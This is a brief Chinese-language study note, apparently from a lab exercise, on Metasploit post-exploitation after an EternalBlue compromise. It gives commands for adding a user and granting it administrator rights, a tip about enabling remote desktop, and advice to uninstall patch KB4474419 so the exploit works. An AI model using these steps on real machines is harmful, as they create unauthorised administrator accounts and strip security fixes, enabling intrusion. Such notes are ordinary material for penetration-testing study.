kali中metasploit使用

shell命令会开启目标机的cmd控制台，打开了这个就相当于可以执行任何命令。

打进去后，进行远程桌面连接的注意事项：

1.创建用户：net user username password /add

2.赋予用户管理员权限：net localgroup group_name UserLoginName /add

3.没有赋予管理员权限远程桌面连接是会失败的。

4.win7不能同时登陆一个账户，比如目标机登录了一个账户，攻击者在进行远程登录桌面时会把目标机顶下去。

一些注意事项：

1.run后报错Host does NOT appear vulnerable.：说明靶机打了补丁的，修复了永恒之蓝漏洞（补丁：KB4474419），删除就可以了。

2.run getgui -e报错：换成 run post/windows/manage/enable_rdp即可